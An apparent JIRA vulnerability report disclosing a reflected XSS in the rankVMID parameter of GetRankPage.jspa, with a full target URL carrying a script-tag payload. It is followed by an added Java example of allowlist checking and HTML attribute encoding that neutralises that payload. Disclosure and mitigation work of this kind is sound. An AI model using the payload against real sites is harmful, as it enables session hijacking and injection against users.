XSS (reflected) in rankVMID parameter of GetRankPage.jspa

2012-08-01T07:46:40
ID ATLASSIAN:JSWSERVER-5562
Type atlassian
Reporter dblack
Modified 2018-10-16T01:05:34

Description

As per https://sdog.jira.com/browse/JSTDEV-2110

Targets: https://test01.jira-dev.com/secure/GetRankPage.jspa?fieldId=customfield_10006&start=0&versionId=-1&rankVMID=field%22%3e%3cscript%3ealert('XSS')%3c/script%3e&decorator=none&selectedProjectId=10000&pageType=ChartBoard&subType=ArchiveChartBoard&type=ACB&selectedBoardId=-1&colPage=1

Reproduction: Open Target URL after login. Apply attack value "><script>alert('XSS')</script> in the rankVMID parameter.
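
Mitigation sketch (an added example, not code from the report or from the JIRA code base): the attack value starts with "> which suggests that rankVMID is reflected inside a double-quoted HTML attribute. That placement is an assumption, as are the template fragment, the class and method names, and the identifier allowlist below. The example shows the reported value rejected by the allowlist and neutralised by attribute encoding.

```java
import java.util.regex.Pattern;

public class RankVmIdEncodingDemo {
    // Assumption: a legitimate rankVMID is a short plain identifier such as "field".
    private static final Pattern SAFE_ID = Pattern.compile("[A-Za-z0-9_.-]{1,64}");

    /** Allowlist check to apply before the parameter is used at all. */
    static boolean isValidId(String value) {
        return value != null && SAFE_ID.matcher(value).matches();
    }

    /** Encodes a string for use inside a quoted HTML attribute value. */
    static String encodeForHtmlAttribute(String value) {
        StringBuilder out = new StringBuilder(value.length() + 16);
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Hypothetical template fragments; the real GetRankPage.jspa markup is not shown in the report.
    static String renderUnsafe(String rankVmId) {
        return "<div id=\"" + rankVmId + "\"></div>";   // raw reflection: quote closes the attribute
    }

    static String renderSafe(String rankVmId) {
        return "<div id=\"" + encodeForHtmlAttribute(rankVmId) + "\"></div>";
    }

    public static void main(String[] args) {
        // URL-decoded rankVMID value taken from the report's target URL.
        String reported = "field\"><script>alert('XSS')</script>";
        System.out.println("reported value passes allowlist: " + isValidId(reported));
        System.out.println("raw reflection:     " + renderUnsafe(reported));
        System.out.println("encoded reflection: " + renderSafe(reported));
        System.out.println("\"field\" passes allowlist: " + isValidId("field"));
    }
}
```

Encoding must match the output context: the routine above covers a quoted attribute or element text only, and a value written into a script block, URL or unquoted attribute needs a different encoder.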